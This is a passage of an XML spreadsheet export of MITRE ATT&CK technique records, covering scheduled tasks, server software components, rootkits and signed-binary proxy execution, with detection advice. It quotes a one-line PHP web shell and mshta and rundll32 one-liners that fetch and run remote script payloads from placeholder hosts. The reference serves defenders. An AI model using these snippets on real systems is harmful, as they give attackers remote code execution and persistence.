    <n v="3.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Monitor for processes that can be used to discover remote systems, such as &lt;code&gt;ping.exe&lt;/code&gt; and &lt;code&gt;tracert.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1091"/>
    <x v="420"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1091"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="23"/>
    <s v="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s v="Windows"/>
    <s v="Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1496"/>
    <x v="421"/>
    <s v="Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. _x000a__x000a_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_x000a__x000a_Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)"/>
    <s v="https://attack.mitre.org/techniques/T1496"/>
    <d v="2019-04-17T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.2"/>
    <x v="1"/>
    <s v="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
    <s v="Containers, IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status"/>
    <b v="0"/>
    <m/>
    <s v="Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1207"/>
    <x v="422"/>
    <s v="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_x000a__x000a_Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1207"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="2"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)_x000a__x000a_Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)_x000a__x000a_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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication"/>
    <b v="0"/>
    <m/>
    <s v="Vincent Le Toux"/>
    <m/>
    <s v="Log analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1014"/>
    <x v="423"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1014"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Drive: Drive Modification, Firmware: Firmware Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control, Application control by file name or path, File monitoring, Host intrusion prevention systems, Signature-based detection, System access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1053"/>
    <x v="424"/>
    <s v="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_x000a__x000a_Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges)."/>
    <s v="https://attack.mitre.org/techniques/T1053"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2.1"/>
    <x v="24"/>
    <s v="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 v="Containers, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="0"/>
    <m/>
    <s v="Alain Homewood, Insomnia Security; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Travis Smith, Tripwire"/>
    <s v="Administrator, SYSTEM, User"/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1053.001"/>
    <x v="425"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1053/001"/>
    <d v="2019-12-03T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="Monitor scheduled task creation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 v="Linux"/>
    <s v="Command: Command Execution, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <m/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1053.002"/>
    <x v="426"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Note: The &lt;code&gt;at.exe&lt;/code&gt; command line utility has been deprecated in current versions of Windows in favor of &lt;code&gt;schtasks&lt;/code&gt;."/>
    <s v="https://attack.mitre.org/techniques/T1053/002"/>
    <d v="2019-11-27T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="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_x000a__x000a_Configure event logging for scheduled task creation and changes by enabling the &quot;Microsoft-Windows-TaskScheduler/Operational&quot; setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)_x000a__x000a_* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered_x000a_* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated_x000a_* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted_x000a_* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created_x000a_* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled_x000a_* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled_x000a__x000a_Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1053.007"/>
    <x v="427"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1053/007"/>
    <d v="2021-03-29T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. "/>
    <s v="Containers"/>
    <s v="Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <s v="Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1053.003"/>
    <x v="428"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1053/003"/>
    <d v="2019-12-03T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="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
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <m/>
    <s v="User"/>
    <m/>
    <b v="0"/>
  </r>
  <r>
    <s v="T1053.004"/>
    <x v="429"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1053/004"/>
    <d v="2019-12-03T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="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 v="macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <m/>
    <s v="root"/>
    <m/>
    <b v="0"/>
  </r>
  <r>
    <s v="T1053.005"/>
    <x v="430"/>
    <s v="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_x000a__x000a_The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1053/005"/>
    <d v="2019-11-27T00:00:00"/>
    <d v="2020-12-30T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="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_x000a__x000a_Configure event logging for scheduled task creation and changes by enabling the &quot;Microsoft-Windows-TaskScheduler/Operational&quot; setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)_x000a__x000a_* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered_x000a_* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated_x000a_* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted_x000a_* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created_x000a_* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled_x000a_* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled_x000a__x000a_Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <m/>
    <s v="Administrator"/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1053.006"/>
    <x v="431"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1053/006"/>
    <d v="2020-10-12T00:00:00"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="1"/>
    <x v="24"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)"/>
    <s v="Linux"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation"/>
    <b v="1"/>
    <s v="T1053"/>
    <s v="SarathKumar Rajendran, Trimble Inc"/>
    <s v="User, root"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1029"/>
    <x v="432"/>
    <s v="Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1029"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="8"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1113"/>
    <x v="433"/>
    <s v="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_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1113"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="7"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1597"/>
    <x v="434"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1597"/>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7.002"/>
    <x v="435"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1597/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7"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1597.001"/>
    <x v="436"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1597/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7"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1596"/>
    <x v="437"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596"/>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6.004"/>
    <x v="438"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596/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1"/>
    <x v="439"/>
    <s v="Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596/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3"/>
    <x v="440"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596/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5"/>
    <x v="441"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596/005"/>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2"/>
    <x v="442"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1596/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3"/>
    <x v="443"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T159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3.002"/>
    <x v="444"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1593/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3"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1593.001"/>
    <x v="445"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1593/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3"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1594"/>
    <x v="446"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1594"/>
    <d v="2020-10-02T00:00:00"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="1"/>
    <x v="5"/>
    <s v="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
    <s v="PRE"/>
    <s v="Application Log: Application Log Content"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1505"/>
    <x v="447"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1505"/>
    <d v="2019-06-28T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1505.001"/>
    <x v="448"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1505/001"/>
    <d v="2019-12-12T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities."/>
    <s v="Linux, Windows"/>
    <s v="Application Log: Application Log Content"/>
    <b v="1"/>
    <s v="T1505"/>
    <s v="Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1505.002"/>
    <x v="449"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1505/002"/>
    <d v="2019-12-12T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="3"/>
    <s v="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s v="Linux, Windows"/>
    <s v="Application Log: Application Log Content, File: File Creation"/>
    <b v="1"/>
    <s v="T1505"/>
    <s v=" Christoffer Strömblad; ESET"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1505.003"/>
    <x v="450"/>
    <s v="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_x000a__x000a_In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) "/>
    <s v="https://attack.mitre.org/techniques/T1505/003"/>
    <d v="2019-12-13T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="3"/>
    <s v="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_x000a__x000a_&lt;code&gt;&amp;lt;?php @eval($_POST['password']);&amp;gt;&lt;/code&gt;_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1505"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1489"/>
    <x v="451"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1489"/>
    <d v="2019-03-29T00:00:00"/>
    <d v="2021-03-02T00:00:00"/>
    <n v="1.2"/>
    <x v="1"/>
    <s v="Monitor processes and command-line arguments to see if critical processes are terminated or stop running._x000a__x000a_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_x000a__x000a_Alterations to the service binary path or the service startup type changed to disabled may be suspicious._x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1129"/>
    <x v="452"/>
    <s v="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_x000a__x000a_The module loader can load DLLs:_x000a__x000a_* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;_x000a_    _x000a_* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);_x000a_    _x000a_* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;_x000a_    _x000a_* via &lt;code&gt;&amp;#x3c;file name=&quot;filename.extension&quot; loadFrom=&quot;fully-qualified or relative pathname&quot;&amp;#x3e;&lt;/code&gt; in an embedded or external &quot;application manifest&quot;. The file name refers to an entry in the IMPORT directory or a forwarded EXPORT._x000a__x000a_Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features."/>
    <s v="https://attack.mitre.org/techniques/T1129"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="2"/>
    <x v="13"/>
    <s v="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_x000a__x000a_Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior."/>
    <s v="Windows"/>
    <s v="Module: Module Load, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <s v="Stefan Kanthak"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1218"/>
    <x v="453"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1218"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="2.1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian"/>
    <m/>
    <s v="Anti-virus, Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.003"/>
    <x v="454"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1218/003"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity._x000a__x000a_Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)_x000a__x000a_* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external._x000a_*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
    <s v="Windows"/>
    <s v="Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1218.001"/>
    <x v="455"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1218/001"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor presence and use of CHM files, especially if they are not typically used within an environment."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.002"/>
    <x v="456"/>
    <s v="Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1218/002"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:_x000a__x000a_*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_x000a_*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quot;c:\windows\system32\control.exe {Canonical_Name}&quot;, SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)_x000a_*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_x000a__x000a_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
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="ESET"/>
    <m/>
    <s v="Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1218.004"/>
    <x v="457"/>
    <s v="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_x000a__x000a_InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;. (Citation: LOLBAS Installutil)"/>
    <s v="https://attack.mitre.org/techniques/T1218/004"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Casey Smith; Travis Smith, Tripwire"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.005"/>
    <x v="458"/>
    <s v="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_x000a__x000a_Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)_x000a__x000a_Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute(&quot;GetObject(&quot;&quot;script:https[:]//webserver/payload[.]sct&quot;&quot;)&quot;))&lt;/code&gt;_x000a__x000a_They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;_x000a__x000a_Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)"/>
    <s v="https://attack.mitre.org/techniques/T1218/005"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-12-30T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious"/>
    <s v="Windows"/>
    <s v="Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.007"/>
    <x v="459"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1218/007"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-12-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Alexandros Pappas"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.008"/>
    <x v="460"/>
    <s v="Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft._x000a__x000a_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quot;C:\Users\Public\file.dll&quot;&amp;rbrace;&lt;/code&gt;). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) _x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1218/008"/>
    <d v="2020-01-24T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <m/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.009"/>
    <x v="461"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1218/009"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Casey Smith"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.010"/>
    <x v="462"/>
    <s v="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_x000a__x000a_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quot;Squiblydoo&quot; attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)"/>
    <s v="https://attack.mitre.org/techniques/T1218/010"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Casey Smith"/>
    <m/>
    <s v="Anti-virus, Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.011"/>
    <x v="463"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot;&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)"/>
    <s v="https://attack.mitre.org/techniques/T1218/011"/>
    <d v="2020-01-23T00:00:00"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1218"/>
    <s v="Casey Smith; Ricardo Dias"/>
    <m/>
    <s v="Anti-virus, Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1218.012"/>
    <x v="464"/>
    <s v="Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1218/012"/>
    <d v="2020-08-10T00:00:00"/>
    <d v="2020-08-19T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
